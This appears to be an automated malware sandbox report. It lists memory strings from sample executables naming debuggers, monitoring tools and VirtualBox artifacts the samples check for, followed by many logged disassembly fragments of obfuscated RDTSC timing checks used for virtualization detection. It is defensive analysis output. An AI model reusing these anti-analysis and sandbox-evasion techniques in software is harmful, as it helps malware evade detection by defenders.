Source: 95bf820dd4.exe, 0000000E.00000003.2901822680.0000000000B50000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: BABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/%HSWPESPY.DLLAVGHOOKX.DLLSBIEDLL.DLLSNXHK.DLLVMCHECK.DLLDIR_WATCH.DLLAPI_LOG.DLLPSTOREC.DLLAVGHOOKA.DLLCMDVRT64.DLLCMDVRT32.DLLIMAGE/JPEGCHAININGMODEAESCHAININGMODEGCMABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=UNKNOWN EXCEPTIONBAD ALLOCATION
Source: 4b8eda303b.exe, 0000000C.00000003.2728432336.0000000007E31000.00000004.00001000.00020000.00000000.sdmp, 2656cd82fe.exe, 0000000D.00000002.2880704353.0000000000F1D000.00000040.00000001.01000000.0000000B.sdmp, 2656cd82fe.exe, 0000000D.00000003.2838596176.000000000751C000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: WINDBG.EXE
Source: 2656cd82fe.exe, 0000000D.00000003.2838596176.000000000751C000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
Source: 4b8eda303b.exe, 0000000C.00000003.2728432336.0000000007E31000.00000004.00001000.00020000.00000000.sdmp, 2656cd82fe.exe, 0000000D.00000002.2880704353.0000000000F1D000.00000040.00000001.01000000.0000000B.sdmp, 2656cd82fe.exe, 0000000D.00000003.2838596176.000000000751C000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: WIRESHARK.EXE

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F5A405 second address: F5A40B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F5A40B second address: F5A40F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F5A40F second address: F5A421 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jns 00007FB1DD323666h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F5A421 second address: F5A431 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FB1DCC289D6h 0x00000008 jnl 00007FB1DCC289D6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F5A842 second address: F5A848 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F5D6BA second address: F5D6BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F5D6BE second address: F5D6C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F5D75E second address: F5D7AA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push ecx 0x00000008 jmp 00007FB1DCC289E3h 0x0000000d pop ecx 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 jmp 00007FB1DCC289DBh 0x00000017 mov eax, dword ptr [eax] 0x00000019 jng 00007FB1DCC289E1h 0x0000001f jmp 00007FB1DCC289DBh 0x00000024 mov dword ptr [esp+04h], eax 0x00000028 push eax 0x00000029 push edx 0x0000002a push ebx 0x0000002b ja 00007FB1DCC289D6h 0x00000031 pop ebx 0x00000032 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F5D916 second address: F5D91A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F5D91A second address: F5D934 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB1DCC289E3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F5D934 second address: F5D978 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 popad 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c jmp 00007FB1DD32366Ch 0x00000011 mov eax, dword ptr [eax] 0x00000013 jmp 00007FB1DD323678h 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c push eax 0x0000001d push edx 0x0000001e jne 00007FB1DD32366Ch 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F5D978 second address: F5D97E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F5D97E second address: F5D982 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F5D982 second address: F5DA27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 mov edx, eax 0x0000000b push 00000003h 0x0000000d jmp 00007FB1DCC289E2h 0x00000012 jmp 00007FB1DCC289E3h 0x00000017 push 00000000h 0x00000019 mov ecx, dword ptr [ebp+122D2C99h] 0x0000001f push 00000003h 0x00000021 push ecx 0x00000022 pushad 0x00000023 mov esi, edx 0x00000025 popad 0x00000026 pop edi 0x00000027 mov edx, 4D2CE97Ch 0x0000002c push F6969FB7h 0x00000031 jmp 00007FB1DCC289DFh 0x00000036 xor dword ptr [esp], 36969FB7h 0x0000003d call 00007FB1DCC289E9h 0x00000042 jmp 00007FB1DCC289E1h 0x00000047 pop esi 0x00000048 lea ebx, dword ptr [ebp+12452627h] 0x0000004e mov ch, 7Dh 0x00000050 sub dword ptr [ebp+1244C03Eh], esi 0x00000056 push eax 0x00000057 pushad 0x00000058 push eax 0x00000059 push edx 0x0000005a js 00007FB1DCC289D6h 0x00000060 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F5DA27 second address: F5DA3B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FB1DD32366Ch 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F5DA3B second address: F5DA3F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F5DABF second address: F5DAC5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F5DAC5 second address: F5DAC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F5DAC9 second address: F5DB2F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 jmp 00007FB1DD323673h 0x0000000e push 00000000h 0x00000010 mov edi, 28AC4AF3h 0x00000015 push F1E0655Ah 0x0000001a jmp 00007FB1DD32366Ch 0x0000001f add dword ptr [esp], 0E1F9B26h 0x00000026 mov edx, ecx 0x00000028 push 00000003h 0x0000002a push 00000000h 0x0000002c mov dword ptr [ebp+122D1C44h], ecx 0x00000032 mov edx, dword ptr [ebp+122D1BD3h] 0x00000038 push 00000003h 0x0000003a movsx edx, ax 0x0000003d push 40CE0057h 0x00000042 push eax 0x00000043 push edx 0x00000044 push ecx 0x00000045 jmp 00007FB1DD32366Bh 0x0000004a pop ecx 0x0000004b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F5DB2F second address: F5DB52 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 ja 00007FB1DCC289D6h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c add dword ptr [esp], 7F31FFA9h 0x00000013 movsx edx, di 0x00000016 lea ebx, dword ptr [ebp+12452632h] 0x0000001c push eax 0x0000001d push eax 0x0000001e push edx 0x0000001f push edx 0x00000020 push edx 0x00000021 pop edx 0x00000022 pop edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F5DB52 second address: F5DB5C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007FB1DD323666h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F7DB71 second address: F7DB77 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F47814 second address: F4781E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007FB1DD323666h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F7BAAB second address: F7BAAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F7BAAF second address: F7BAB9 instructions: 0x00000000 rdtsc 0x00000002 js 00007FB1DD323666h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F7BAB9 second address: F7BAC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c pop edi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F7BAC6 second address: F7BACD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F7BACD second address: F7BAD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F7BAD3 second address: F7BAD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F7BD80 second address: F7BD84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F7BD84 second address: F7BDAD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007FB1DD323675h 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007FB1DD32366Dh 0x00000013 jnl 00007FB1DD32366Ah 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F7BDAD second address: F7BDB3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F7BEF5 second address: F7BF0B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB1DD323671h 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F7BF0B second address: F7BF21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop ecx 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jbe 00007FB1DCC28A05h 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push edx 0x00000013 pop edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F7BF21 second address: F7BF3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FB1DD323677h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F7BF3F second address: F7BF43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F7C041 second address: F7C047 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F7C047 second address: F7C067 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FB1DCC289E7h 0x0000000c push edx 0x0000000d pop edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F7C1BD second address: F7C1C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F7C1C1 second address: F7C1D6 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FB1DCC289D6h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d jo 00007FB1DCC289D6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F7C1D6 second address: F7C1ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jno 00007FB1DD32366Ch 0x0000000b popad 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F7C1ED second address: F7C1F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FB1DCC289D6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F7C1F7 second address: F7C1FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F7C1FB second address: F7C20E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 ja 00007FB1DCC289D6h 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F7C340 second address: F7C344 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F7C344 second address: F7C348 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F7C4BB second address: F7C4C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F7CA58 second address: F7CA5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F7CA5E second address: F7CA6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 ja 00007FB1DD323666h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F7D217 second address: F7D21B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F7D21B second address: F7D231 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FB1DD32366Dh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F7D231 second address: F7D236 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F7D705 second address: F7D709 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F7D709 second address: F7D738 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB1DCC289E5h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop eax 0x0000000c pushad 0x0000000d jnl 00007FB1DCC289D8h 0x00000013 push eax 0x00000014 push edx 0x00000015 jo 00007FB1DCC289D6h 0x0000001b push esi 0x0000001c pop esi 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F7D738 second address: F7D742 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FB1DD323666h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F7D9F4 second address: F7DA1C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007FB1DCC289E0h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FB1DCC289E0h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F7DA1C second address: F7DA26 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007FB1DD323666h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F80724 second address: F8072A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F4E0BD second address: F4E0D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FB1DD323670h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F4E0D2 second address: F4E0DE instructions: 0x00000000 rdtsc 0x00000002 je 00007FB1DCC289DEh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F89F30 second address: F89F34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F89F34 second address: F89F46 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FB1DCC289D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jbe 00007FB1DCC289E2h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F89F46 second address: F89F4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F89F4C second address: F89F50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F89F50 second address: F89F56 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F89AC1 second address: F89AC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F89AC7 second address: F89AE0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007FB1DD32366Eh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8BE0B second address: F8BE10 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8BE10 second address: F8BE4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 add dword ptr [esp], 5F715903h 0x0000000e push 00000000h 0x00000010 push edx 0x00000011 call 00007FB1DD323668h 0x00000016 pop edx 0x00000017 mov dword ptr [esp+04h], edx 0x0000001b add dword ptr [esp+04h], 00000014h 0x00000023 inc edx 0x00000024 push edx 0x00000025 ret 0x00000026 pop edx 0x00000027 ret 0x00000028 mov dword ptr [ebp+122D1C94h], esi 0x0000002e push EF67199Bh 0x00000033 push eax 0x00000034 push edx 0x00000035 push eax 0x00000036 push edx 0x00000037 pushad 0x00000038 popad 0x00000039 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8BE4B second address: F8BE51 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8C11F second address: F8C124 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8C124 second address: F8C136 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b jng 00007FB1DCC289D6h 0x00000011 pop edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8C136 second address: F8C13B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8C1D9 second address: F8C1DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8C8E6 second address: F8C8EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8CF30 second address: F8CF34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8CF34 second address: F8CF3A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8CF3A second address: F8CF4C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FB1DCC289DDh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8CFAC second address: F8CFB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8D4EA second address: F8D4EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8D4EE second address: F8D4F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8EE53 second address: F8EE6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FB1DCC289D6h 0x0000000a jns 00007FB1DCC289D6h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push esi 0x00000014 pop esi 0x00000015 jp 00007FB1DCC289D6h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8F3A7 second address: F8F433 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB1DD323671h 0x00000009 popad 0x0000000a jmp 00007FB1DD323671h 0x0000000f popad 0x00000010 nop 0x00000011 push 00000000h 0x00000013 push eax 0x00000014 call 00007FB1DD323668h 0x00000019 pop eax 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e add dword ptr [esp+04h], 00000019h 0x00000026 inc eax 0x00000027 push eax 0x00000028 ret 0x00000029 pop eax 0x0000002a ret 0x0000002b push 00000000h 0x0000002d push 00000000h 0x0000002f push ebx 0x00000030 call 00007FB1DD323668h 0x00000035 pop ebx 0x00000036 mov dword ptr [esp+04h], ebx 0x0000003a add dword ptr [esp+04h], 00000015h 0x00000042 inc ebx 0x00000043 push ebx 0x00000044 ret 0x00000045 pop ebx 0x00000046 ret 0x00000047 sub dword ptr [ebp+122D1DF8h], edx 0x0000004d sub esi, dword ptr [ebp+122D1CC9h] 0x00000053 push 00000000h 0x00000055 mov dword ptr [ebp+122D1D0Eh], eax 0x0000005b push eax 0x0000005c je 00007FB1DD323678h 0x00000062 push eax 0x00000063 push edx 0x00000064 jno 00007FB1DD323666h 0x0000006a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8F433 second address: F8F437 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8FB78 second address: F8FBA1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB1DD323674h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FB1DD32366Fh 0x00000010 rdtsc
